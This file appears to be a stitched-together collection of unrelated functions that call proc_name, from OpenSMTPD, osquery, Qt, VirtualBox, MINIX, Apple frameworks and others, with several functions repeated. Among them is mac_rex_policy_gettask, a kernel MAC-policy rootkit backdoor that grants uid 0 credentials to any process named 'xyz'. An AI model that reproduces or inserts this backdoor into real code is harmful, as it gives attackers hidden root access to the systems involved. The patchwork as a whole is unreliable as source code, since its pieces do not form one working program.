void
m_add(struct mproc *p, const void *data, size_t len)
{
size_t alloc;
void *tmp;
if (p->m_pos + len + IMSG_HEADER_SIZE > MAX_IMSGSIZE) {
log_warnx("warn: message to large");
fatal(NULL);
}
alloc = p->m_alloc ? p->m_alloc : 128;
while (p->m_pos + len > alloc)
alloc *= 2;
if (alloc != p->m_alloc) {
log_trace(TRACE_MPROC, "mproc: %s -> %s: realloc %zu -> %zu",
proc_name(smtpd_process),
proc_name(p->proc),
p->m_alloc,
alloc);
tmp = recallocarray(p->m_buf, p->m_alloc, alloc, 1);
if (tmp == NULL)
fatal("realloc");
p->m_alloc = alloc;
p->m_buf = tmp;
}
memmove(p->m_buf + p->m_pos, data, len);
p->m_pos += len;
}
void
mproc_enable(struct mproc *p)
{
if (p->enable == 0) {
log_trace(TRACE_MPROC, "mproc: %s -> %s: enabled",
proc_name(smtpd_process),
proc_name(p->proc));
p->enable = 1;
}
mproc_event_add(p);
}
void
m_close(struct mproc *p)
{
if (imsg_compose(&p->imsgbuf, p->m_type, p->m_peerid, p->m_pid, p->m_fd,
p->m_buf, p->m_pos) == -1)
fatal("imsg_compose");
log_trace(TRACE_MPROC, "mproc: %s -> %s : %zu %s",
proc_name(smtpd_process),
proc_name(p->proc),
p->m_pos,
imsg_to_str(p->m_type));
mproc_event_add(p);
}
static int
rsae_bn_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
return (rsa_default->bn_mod_exp(r, a, p, m, ctx, m_ctx));
}
static int
rsae_pub_dec(int flen,const unsigned char *from, unsigned char *to, RSA *rsa,
int padding)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
return (rsa_default->rsa_pub_dec(flen, from, to, rsa, padding));
}
QueryData genProcesses() {
QueryData results;
proc_t* proc_info;
PROCTAB* proc = openproc(PROC_SELECTS);
// Populate proc struc for each process.
while ((proc_info = readproc(proc, NULL))) {
Row r;
r["pid"] = boost::lexical_cast<std::string>(proc_info->tid);
r["name"] = proc_name(proc_info);
r["cmdline"] = proc_cmdline(proc_info);
r["path"] = proc_link(proc_info);
r["on_disk"] = osquery::pathExists(r["path"]).toString();
r["resident_size"] = boost::lexical_cast<std::string>(proc_info->vm_rss);
r["phys_footprint"] = boost::lexical_cast<std::string>(proc_info->vm_size);
r["user_time"] = boost::lexical_cast<std::string>(proc_info->utime);
r["system_time"] = boost::lexical_cast<std::string>(proc_info->stime);
r["start_time"] = boost::lexical_cast<std::string>(proc_info->start_time);
r["parent"] = boost::lexical_cast<std::string>(proc_info->ppid);
results.push_back(r);
standard_freeproc(proc_info);
}
closeproc(proc);
return results;
}
static CFStringRef SecTaskCopyDebugDescription(CFTypeRef cfTask)
{
SecTaskRef task = (SecTaskRef) cfTask;
pid_t pid;
if (task->pid_self==-1) {
audit_token_to_au32(task->token, NULL, NULL, NULL, NULL, NULL, &pid, NULL, NULL);
} else {
pid = task->pid_self;
}
#if USE_LIBPROC
#define MAX_PROCNAME 32
char task_name[MAX_PROCNAME + 1] = {};
proc_name(pid, task_name, MAX_PROCNAME);
#else
const char *task_name;
int mib[] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, pid};
struct kinfo_proc kp;
size_t len = sizeof(kp);
if (sysctl(mib, 4, &kp, &len, NULL, 0) == -1 || len == 0)
task_name = strerror(errno);
else
task_name = kp.kp_proc.p_comm;
#endif
return CFStringCreateWithFormat(CFGetAllocator(task), NULL, CFSTR("%s[%" PRIdPID "]/%d#%d LF=%d"), task_name, pid,
task->entitlementsLoaded, task->entitlements ? (int)CFDictionaryGetCount(task->entitlements) : -1, task->lastFailure);
}
QueryData genProcesses(QueryContext& context) {
QueryData results;
proc_t* proc_info;
PROCTAB* proc = openproc(PROC_SELECTS);
// Populate proc struc for each process.
while ((proc_info = readproc(proc, NULL))) {
Row r;
r["pid"] = INTEGER(proc_info->tid);
r["uid"] = BIGINT((unsigned int)proc_info->ruid);
r["gid"] = BIGINT((unsigned int)proc_info->rgid);
r["euid"] = BIGINT((unsigned int)proc_info->euid);
r["egid"] = BIGINT((unsigned int)proc_info->egid);
r["name"] = proc_name(proc_info);
r["cmdline"] = proc_cmdline(proc_info);
r["path"] = proc_link(proc_info);
r["on_disk"] = osquery::pathExists(r["path"]).toString();
r["resident_size"] = INTEGER(proc_info->vm_rss);
r["phys_footprint"] = INTEGER(proc_info->vm_size);
r["user_time"] = INTEGER(proc_info->utime);
r["system_time"] = INTEGER(proc_info->stime);
r["start_time"] = INTEGER(proc_info->start_time);
r["parent"] = INTEGER(proc_info->ppid);
results.push_back(r);
standard_freeproc(proc_info);
}
closeproc(proc);
return results;
}
bool IOHIDEventSystemUserClient::
initWithTask(task_t owningTask, void * /* security_id */, UInt32 /* type */)
{
bool result = false;
OSObject* entitlement = copyClientEntitlement(owningTask, kIOHIDSystemUserAccessServiceEntitlement);
if (entitlement) {
result = (entitlement == kOSBooleanTrue);
entitlement->release();
}
if (!result) {
proc_t process;
process = (proc_t)get_bsdtask_info(owningTask);
char name[255];
bzero(name, sizeof(name));
proc_name(proc_pid(process), name, sizeof(name));
HIDLogError("%s is not entitled", name);
goto exit;
}
result = super::init();
require_action(result, exit, HIDLogError("failed"));
exit:
return result;
}
void
m_compose(struct mproc *p, uint32_t type, uint32_t peerid, pid_t pid, int fd,
void *data, size_t len)
{
imsg_compose(&p->imsgbuf, type, peerid, pid, fd, data, len);
if (type != IMSG_STAT_DECREMENT &&
type != IMSG_STAT_INCREMENT)
log_trace(TRACE_MPROC, "mproc: %s -> %s : %zu %s",
proc_name(smtpd_process),
proc_name(p->proc),
len,
imsg_to_str(type));
mproc_event_add(p);
}
errno_t IOWebFilterClass::tl_attach_func(void **cookie, socket_t so)
{
LOG(LOG_DEBUG, "enter");
SocketTracker *tracker = new SocketTracker();
*cookie=(void*)tracker;
if(tracker==NULL) return 0;
bzero(tracker, sizeof(SocketTracker));
tracker->lock = IOLockAlloc();
if(tracker->lock==NULL)
{
tracker->magic=kSocketTrackerInvalid;
return 0;
}
tracker->magic=kSocketTrackerAttach;
tracker->pid = proc_selfpid(); //get the process id
LOG(LOG_DEBUG, "pid=%d", tracker->pid);
if(tracker->pid==0)
{
tracker->magic=kSocketTrackerInvalid;
return 0;
}
bzero(tracker->proc_name, sizeof(tracker->proc_name));
proc_name(tracker->pid, tracker->proc_name, sizeof(char)*(sizeof(tracker->proc_name)-1));
LOG(LOG_DEBUG, "proc=%s, magic=%ld", tracker->proc_name, tracker->magic);
return 0;
}
QString QLockFilePrivate::processNameByPid(qint64 pid)
{
#if defined(Q_OS_OSX)
char name[1024];
proc_name(pid, name, sizeof(name) / sizeof(char));
return QFile::decodeName(name);
#elif defined(Q_OS_LINUX)
if (!QFile::exists(QStringLiteral("/proc/version")))
return QString();
char exePath[64];
char buf[PATH_MAX + 1];
sprintf(exePath, "/proc/%lld/exe", pid);
size_t len = (size_t)readlink(exePath, buf, sizeof(buf));
if (len >= sizeof(buf)) {
// The pid is gone. Return some invalid process name to fail the test.
return QStringLiteral("/ERROR/");
}
buf[len] = 0;
return QFileInfo(QFile::decodeName(buf)).fileName();
#elif defined(Q_OS_BSD4) && !defined(Q_OS_IOS)
kinfo_proc *proc = kinfo_getproc(pid);
if (!proc)
return QString();
QString name = QFile::decodeName(proc->ki_comm);
free(proc);
return name;
#else
return QString();
#endif
}
int find_pids_by_binary_name(char *bin_name, pidinfo_t *pid_list, int max_pids)
{
int pid_count=0;
int nb_processes = proc_listpids(PROC_ALL_PIDS, 0, NULL, 0);
char exe[1024];
pid_t *pids = malloc(nb_processes * sizeof(pid_t));
int i;
proc_listpids(PROC_ALL_PIDS, 0, pids, nb_processes);
for(i = 0; i < nb_processes; ++i) {
if (pids[i] == 0) {
continue;
}
proc_name(pids[i], exe, sizeof(exe));
if(!strcmp(exe, bin_name)) {
pid_list[pid_count].pid=pids[i];
strcpy(pid_list[pid_count].name, bin_name);
pid_count++;
if(pid_count==max_pids)
break;
}
}
free(pids);
return pid_count;
}
QueryData genProcessEnvs(QueryContext& context) {
QueryData results;
proc_t* proc_info;
PROCTAB* proc = openproc(PROC_SELECTS);
// Populate proc struc for each process.
while ((proc_info = readproc(proc, NULL))) {
auto env = proc_env(proc_info);
for (auto itr = env.begin(); itr != env.end(); ++itr) {
Row r;
r["pid"] = INTEGER(proc_info->tid);
r["name"] = proc_name(proc_info);
r["path"] = proc_link(proc_info);
r["key"] = itr->first;
r["value"] = itr->second;
results.push_back(r);
}
standard_freeproc(proc_info);
}
closeproc(proc);
return results;
}
void
config_peer(enum smtp_proc_type proc)
{
struct mproc *p;
if (proc == smtpd_process)
fatal("config_peers: cannot peer with oneself");
p = xcalloc(1, sizeof *p, "config_peer");
p->proc = proc;
p->name = xstrdup(proc_name(proc), "config_peer");
p->handler = imsg_dispatch;
mproc_init(p, pipes[smtpd_process][proc]);
mproc_enable(p);
pipes[smtpd_process][proc] = -1;
if (proc == PROC_CONTROL)
p_control = p;
else if (proc == PROC_LKA)
p_lka = p;
else if (proc == PROC_PARENT)
p_parent = p;
else if (proc == PROC_QUEUE)
p_queue = p;
else if (proc == PROC_SCHEDULER)
p_scheduler = p;
else if (proc == PROC_PONY)
p_pony = p;
else if (proc == PROC_CA)
p_ca = p;
else
fatalx("bad peer");
}
static int
mac_rex_policy_gettask(kauth_cred_t cred,struct proc *p)
{
// activate lock
lck_mtx_lock(&p->p_mlock);
char processname[MAXCOMLEN+1];
// retrieve the process name
proc_name(p->p_pid, processname, sizeof(processname));
// match our backdoor activation process
if (strcmp(processname, "xyz") == 0)
{
printf("[rex_the_wonder_dog] giving r00t to %s\n", processname);
// the old kauth_cred
kauth_cred_t mycred = p->p_ucred;
// get a new kauth_cred, with uid=0, and gid=0
kauth_cred_t mynewcred = real_kauth(mycred, 0, 0);
// copy back to our backdoor process and we have r00t!
p->p_ucred = mynewcred;
lck_mtx_unlock(&p->p_mlock);
// everything is ok
return 0;
}
else {
// printf("[rex_the_wonder_dog] task_for_pid %s\n", processname);
// everything is ok
lck_mtx_unlock(&p->p_mlock);
return 0;
}
}
/**
* Device open. Called on open /dev/vboxnetctl
*
* @param pInode Pointer to inode info structure.
* @param pFilp Associated file pointer.
*/
static int VBoxNetAdpDarwinOpen(dev_t Dev, int fFlags, int fDevType, struct proc *pProcess)
{
char szName[128];
szName[0] = '\0';
proc_name(proc_pid(pProcess), szName, sizeof(szName));
Log(("VBoxNetAdpDarwinOpen: pid=%d '%s'\n", proc_pid(pProcess), szName));
return 0;
}
void test1()
{
char name[1024];
int rv = proc_name(getpid(), name, sizeof name);
TEST("proc_name() retval", rv != 0);
TEST("proc_name() strstr", strstr(name, "libproc") != NULL);
}
static void
process_stat(struct mproc *p)
{
char buf[1024];
struct stat_value value;
if (p == NULL)
return;
value.type = STAT_COUNTER;
(void)snprintf(buf, sizeof buf, "buffer.%s.%s",
proc_name(smtpd_process),
proc_name(p->proc));
value.u.counter = p->bytes_queued_max;
p->bytes_queued_max = p->bytes_queued;
stat_set(buf, &value);
}
void
m_flush(struct mproc *p)
{
if (imsg_compose(&p->imsgbuf, p->m_type, p->m_peerid, p->m_pid, p->m_fd,
p->m_buf, p->m_pos) == -1)
fatal("imsg_compose");
log_trace(TRACE_MPROC, "mproc: %s -> %s : %zu %s (flush)",
proc_name(smtpd_process),
proc_name(p->proc),
p->m_pos,
imsg_to_str(p->m_type));
p->m_pos = 0;
imsg_flush(&p->imsgbuf);
}
static int
rsae_finish(RSA *rsa)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
if (rsa_default->finish == NULL)
return (1);
return (rsa_default->finish(rsa));
}
void
m_forward(struct mproc *p, struct imsg *imsg)
{
imsg_compose(&p->imsgbuf, imsg->hdr.type, imsg->hdr.peerid,
imsg->hdr.pid, imsg->fd, imsg->data,
imsg->hdr.len - sizeof(imsg->hdr));
if (imsg->hdr.type != IMSG_STAT_DECREMENT &&
imsg->hdr.type != IMSG_STAT_INCREMENT)
log_trace(TRACE_MPROC, "mproc: %s -> %s : %zu %s (forward)",
proc_name(smtpd_process),
proc_name(p->proc),
imsg->hdr.len - sizeof(imsg->hdr),
imsg_to_str(imsg->hdr.type));
mproc_event_add(p);
}
static int
rsae_verify(int dtype, const unsigned char *m, unsigned int m_length,
const unsigned char *sigbuf, unsigned int siglen, const RSA *rsa)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
return (rsa_default->rsa_verify(dtype, m, m_length,
sigbuf, siglen, rsa));
}
static int
rsae_sign(int type, const unsigned char *m, unsigned int m_length,
unsigned char *sigret, unsigned int *siglen, const RSA *rsa)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
return (rsa_default->rsa_sign(type, m, m_length,
sigret, siglen, rsa));
}
std::string getProcName(int pid) {
char name[1024] = "\0";
int bufsize = proc_name(pid, name, sizeof(name));
if (bufsize <= 0) {
name[0] = '\0';
}
return std::string(name);
}
static int
rsae_priv_dec(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
{
log_debug("debug: %s: %s", proc_name(smtpd_process), __func__);
if (RSA_get_ex_data(rsa, 0) != NULL) {
return (rsae_send_imsg(flen, from, to, rsa, padding,
IMSG_CA_PRIVDEC));
}
return (rsa_default->rsa_priv_dec(flen, from, to, rsa, padding));
}
PUBLIC void p_dmp()
{
/* Proc table dump */
register struct proc *rp;
static struct proc *oldrp = BEG_PROC_ADDR;
int n = 0;
phys_clicks text, data, size;
int proc_nr;
printf("\n--pid --pc- ---sp- flag -user --sys-- -text- -data- -size- -recv- command\n");
for (rp = oldrp; rp < END_PROC_ADDR; rp++) {
proc_nr = proc_number(rp);
if (rp->p_flags & P_SLOT_FREE) continue;
if (++n > 20) break;
text = rp->p_map[T].mem_phys;
data = rp->p_map[D].mem_phys;
size = rp->p_map[T].mem_len
+ ((rp->p_map[S].mem_phys + rp->p_map[S].mem_len) - data);
printf("%5d %5lx %6lx %2x %7U %7U %5uK %5uK %5uK ",
proc_nr < 0 ? proc_nr : rp->p_pid,
(unsigned long) rp->p_reg.pc,
(unsigned long) rp->p_reg.sp,
rp->p_flags,
rp->user_time, rp->sys_time,
click_to_round_k(text), click_to_round_k(data),
click_to_round_k(size));
if (rp->p_flags & RECEIVING) {
printf("%-7.7s", proc_name(rp->p_getfrom));
} else
if (rp->p_flags & SENDING) {
printf("S:%-5.5s", proc_name(rp->p_sendto));
} else
if (rp->p_flags == 0) {
printf(" ");
}
printf("%s\n", rp->p_name);
}
if (rp == END_PROC_ADDR) rp = BEG_PROC_ADDR; else printf("--more--\r");
oldrp = rp;
}
static void
m_error(const char *error)
{
char buf[512];
(void)snprintf(buf, sizeof buf, "%s: %s: %s",
proc_name(smtpd_process),
imsg_to_str(current->hdr.type),
error);
fatalx("%s", buf);
}
QString QLockFilePrivate::processNameByPid(qint64 pid)
{
#if defined(Q_OS_OSX)
char name[1024];
proc_name(pid, name, sizeof(name) / sizeof(char));
return QFile::decodeName(name);
#elif defined(Q_OS_LINUX)
if (!QFile::exists(QStringLiteral("/proc/version")))
return QString();
char exePath[64];
char buf[PATH_MAX + 1];
sprintf(exePath, "/proc/%lld/exe", pid);
size_t len = (size_t)readlink(exePath, buf, sizeof(buf));
if (len >= sizeof(buf)) {
// The pid is gone. Return some invalid process name to fail the test.
return QStringLiteral("/ERROR/");
}
buf[len] = 0;
return QFileInfo(QFile::decodeName(buf)).fileName();
#elif defined(Q_OS_BSD4) && !defined(Q_OS_IOS)
# if defined(Q_OS_NETBSD)
struct kinfo_proc2 kp;
int mib[6] = { CTL_KERN, KERN_PROC2, KERN_PROC_PID, (int)pid, sizeof(struct kinfo_proc2), 1 };
# elif defined(Q_OS_OPENBSD)
struct kinfo_proc kp;
int mib[6] = { CTL_KERN, KERN_PROC, KERN_PROC_PID, (int)pid, sizeof(struct kinfo_proc), 1 };
# else
struct kinfo_proc kp;
int mib[4] = { CTL_KERN, KERN_PROC, KERN_PROC_PID, (int)pid };
# endif
size_t len = sizeof(kp);
u_int mib_len = sizeof(mib)/sizeof(u_int);
if (sysctl(mib, mib_len, &kp, &len, NULL, 0) < 0)
return QString();
# if defined(Q_OS_OPENBSD) || defined(Q_OS_NETBSD)
if (kp.p_pid != pid)
return QString();
QString name = QFile::decodeName(kp.p_comm);
# else
if (kp.ki_pid != pid)
return QString();
QString name = QFile::decodeName(kp.ki_comm);
# endif
return name;
#else
Q_UNUSED(pid);
return QString();
#endif
}
/*===========================================================================*
* p_dmp *
*===========================================================================*/
PUBLIC void p_dmp()
{
/* Proc table dump */
register struct proc *rp;
static struct proc *oldrp = BEG_PROC_ADDR;
int n = 0;
vir_clicks base, limit;
printf(
"\nproc pid pc sp splow flag user sys recv command\n");
for (rp = oldrp; rp < END_PROC_ADDR; rp++) {
if (rp->p_flags & P_SLOT_FREE) continue;
if (++n > 20) break;
base = rp->p_map[T].mem_phys;
limit = rp->p_map[S].mem_phys + rp->p_map[S].mem_len;
printf("%4u %4u %6lx %6lx %6lx %4x %5U %6U ",
proc_number(rp),
rp->p_pid,
(unsigned long) rp->p_reg.pc,
(unsigned long) rp->p_reg.sp,
(unsigned long) rp->p_splow,
rp->p_flags,
rp->user_time, rp->sys_time);
if (rp->p_flags & RECEIVING) {
printf("%-7.7s", proc_name(rp->p_getfrom));
} else
if (rp->p_flags & SENDING) {
printf("S:%-5.5s", proc_name(rp->p_sendto));
} else
if (rp->p_flags == 0) {
printf(" ");
}
printf("%s\n", rp->p_name);
}
if (rp == END_PROC_ADDR) rp = BEG_PROC_ADDR; else printf("--more--\r");
oldrp = rp;
}